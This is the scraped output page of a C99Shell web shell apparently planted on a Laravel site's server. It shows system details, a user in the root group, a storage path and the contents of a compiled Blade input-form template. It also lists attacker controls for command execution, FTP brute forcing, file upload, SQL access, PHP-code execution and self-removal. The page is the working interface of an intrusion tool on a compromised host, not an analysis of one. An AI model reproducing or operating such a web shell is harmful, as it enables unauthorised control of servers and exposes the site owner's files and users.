!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/storage/framework/views/   drwxrwsr-t
Free 29.22 GB of 117.98 GB (24.77%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     2680f375e832b48ce7df0c762404164444de2f01.php (1.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php if(isset($separator)): ?>
    <br />
    <h4 id="sep<?php echo e($id); ?>" class="display-4 mb-0"><?php echo e(__($separator)); ?></h4>
    <hr />
<?php endif; ?>
<div id="form-group-<?php echo e($id); ?>" class="form-group<?php echo e($errors->has($id) ? ' has-danger' ''); ?>  <?php if(isset($class)): ?> <?php echo e($class); ?> <?php endif; ?>">
     <?php if(!(isset($type)&&$type=="hidden")): ?>
        <label class="form-control-label" for="<?php echo e($id); ?>"><?php echo e(__($name)); ?><?php if(isset($link)): ?><a target="_blank" href="<?php echo e($link); ?>"><?php echo e($linkName); ?></a><?php endif; ?></label>
    <?php endif; ?>
<input <?php if(isset($accept)): ?> accept="<?php echo e($accept); ?><?php endif; ?> step="<?php echo e(isset($step)?$step:".01"); ?><?php if(isset($min)): ?> min="<?php echo e($min); ?><?php endif; ?>  <?php if(isset($max)): ?> max="<?php echo e($max); ?><?php endif; ?> type="<?php echo e(isset($type)?$type:"text"); ?>" name="<?php echo e($id); ?>" id="<?php echo e($id); ?>" class="form-control form-control <?php if(isset($editclass)): ?> <?php echo e($editclass); ?> <?php endif; ?>  <?php echo e($errors->has($id) ? ' is-invalid' ''); ?>" placeholder="<?php echo e(__($placeholder)); ?>" value="<?php echo e(old($id)?old($id):(isset($value)?$value:(app('request')->input($id)?app('request')->input($id):null))); ?><?php if($required) {echo 'required';} ?> >
    <?php if(isset($additionalInfo)): ?>
        <small class="text-muted"><strong><?php echo e(__($additionalInfo)); ?></strong></small>
    <?php endif; ?>
    <?php if($errors->has($id)): ?>
        <span class="invalid-feedback" role="alert">
            <strong><?php echo e($errors->first($id)); ?></strong>
        </span>
    <?php endif; ?>
</div>
<?php /**PATH /home/picotech/domains/wataxi.picotech.app/public_html/resources/views/partials/input.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--